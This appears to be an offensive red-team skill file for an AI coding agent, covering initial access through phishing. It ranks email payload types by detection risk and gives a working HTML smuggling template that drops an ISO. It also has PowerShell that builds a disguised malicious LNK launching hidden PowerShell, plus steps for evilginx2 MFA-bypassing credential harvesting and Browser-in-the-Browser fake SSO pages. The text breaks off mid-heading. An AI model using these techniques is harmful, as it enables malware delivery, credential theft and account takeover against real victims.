Install: claude install-skill sunilgentyala/OmniRed
# Initial Access
## Phishing — Email
### Payload types (ordered from most to least likely to be detected)
```
1. Macro-enabled Office documents (.xlsm, .docm): high detection; Office blocks VBA macros in internet-sourced (Mark-of-the-Web) files by default
2. ISO/IMG containers: medium detection; mounting an ISO historically dropped Mark-of-the-Web, but since the November 2022 Windows updates files inside a mounted ISO inherit it, so this no longer bypasses SmartScreen or macro blocking on patched hosts
3. HTML smuggling: medium detection; the file is assembled in the browser, so a gateway scanning the attachment at rest sees only HTML and JavaScript
4. LNK files: medium detection; the command line is stored as plain text inside the shortcut and is trivial for gateways and EDR to extract
5. PDF with embedded link: lower detection; the attachment carries only a URL, not a payload
6. QR code phishing (to mobile): lowest detection; the URL is opened on a personal device, outside the corporate mail and proxy path
```
### HTML Smuggling
The attachment (or linked page) carries the payload as a base64 string. The victim's browser decodes it into a Blob and triggers a download, so a gateway that scans the attachment at rest sees only HTML and JavaScript, never the file. A gateway or sandbox that renders the page does see the download, and the dropped file (here an ISO) still has to survive on-host inspection.

One pitfall: `atob()` returns a string with one 16-bit code unit per byte, and `Blob([string])` UTF-8 encodes that string, which corrupts every byte at or above 0x80. Copy the bytes into a `Uint8Array` first:
```html
<!DOCTYPE html>
<html>
<body onload="d()">
<script>
function d() {
  var s = atob("[BASE64_PAYLOAD]");
  // One byte per code unit: take the low byte of each into a typed array.
  // Passing s straight to Blob() would UTF-8 encode it and corrupt the file.
  var bytes = Uint8Array.from(s, function (c) { return c.charCodeAt(0); });
  var blob = new Blob([bytes], {type: 'application/octet-stream'});
  var url = window.URL.createObjectURL(blob);
  var a = document.createElement('a');
  a.href = url;
  a.download = 'update.iso';     // filename the browser saves under
  document.body.appendChild(a);  // some browsers ignore click() on a detached anchor
  a.click();
}
</script>
</body>
</html>
```
### LNK Payload
```powershell
# Create malicious LNK. Explorer hides the .lnk extension, so the file shows
# as "Update" with whatever icon is set below.
$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:TEMP\Update.lnk")
$lnk.TargetPath = "C:\Windows\System32\cmd.exe"
# The argument string is stored verbatim inside the shortcut; it is the first
# thing gateways, sandboxes and EDR parsers read from an LNK.
$lnk.Arguments = "/c powershell -w hidden -ep bypass -c [payload]"
$lnk.IconLocation = "C:\Windows\System32\shell32.dll,3"   # stock shell32 icon (index 3 is the folder icon)
$lnk.WindowStyle = 7                                        # 7 = minimized without focus, so no console flashes
$lnk.Save()
```
## Phishing — Web (Link / Credential Harvesting)
This is spearphishing-link credential capture, not a drive-by download: the victim still has to click and type, and the page records what they type.
```
Credential harvesting site:
1. Stand up a login page. SET clones a static copy of the target's form; evilginx2 instead reverse-proxies the real login flow and captures the session cookies issued after MFA completes
2. Send the link via spearphishing. The lure domain needs a valid TLS certificate and a plausible name, since the URL bar is the only thing the victim can check
3. Harvest credentials (and, with a proxy, live session tokens) in real time
4. Caveat: proxy phishing defeats OTP and push-based MFA but not origin-bound FIDO2/WebAuthn authenticators, which will not sign for the lure domain
Browser-in-the-Browser (BitB):
1. Render a fake browser popup inside the phishing page (window chrome, address bar and padlock drawn with HTML/CSS) that simulates an SSO login
2. Capture credentials before they reach the real SSO provider
3. Caveat: the "popup" is part of the page's DOM, so it cannot be dragged past the edge of the parent tab and its address bar is page text, not a real address bar; users trained on that drag test will spot it
```
## Wateri